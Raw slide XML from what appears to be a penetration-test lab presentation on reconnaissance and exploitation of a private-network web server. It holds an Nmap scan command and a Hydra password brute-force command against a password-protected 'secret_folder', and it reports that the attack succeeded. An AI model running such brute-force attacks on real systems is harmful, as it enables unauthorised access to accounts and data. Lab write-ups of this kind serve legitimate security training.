                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Discovered 4 hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Discovered services running and version numbers to cross check against vunerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000"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000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Discovered corporate webserver, along with SSH services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000"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lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1101" name="Google Shape;1101;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1102" name="Google Shape;1102;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03" name="Google Shape;1103;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4" name="Google Shape;1104;p61"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="23715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endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E214FDF4-345B-C8EE-28EF-743E20EEF1CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6492505" y="1514017"/>
            <a:ext cx="2190527" cy="798861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21DAADE-8A06-A941-0CB8-EE4D1BAFA1EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500150" y="2359903"/>
            <a:ext cx="2173549" cy="195619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r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Directory Transversal - Continued</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p6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r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hydra –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –P /user/share/wordlists/rockyou.txt –s 80 –f –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>vV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> 192.168.1.105 http-get /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="800" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="800" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p62"/>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2"/>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000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>map –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –A 192.168.1.105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Read the following</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meet_our_team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/ashton.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Run a hydra attack against the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1115" name="Google Shape;1115;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16" name="Google Shape;1116;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 name="Google Shape;1117;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1118" name="Google Shape;1118;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19" name="Google Shape;1119;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0" name="Google Shape;1120;p62"/>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="148057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000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Discovery of the secret folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Secret folder password protected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Run hydra attack iaw image on the right</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Successful iaw image on right</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1122" name="Google Shape;1122;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1123" name="Google Shape;1123;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24" name="Google Shape;1124;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5" name="Google Shape;1125;p62"/>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
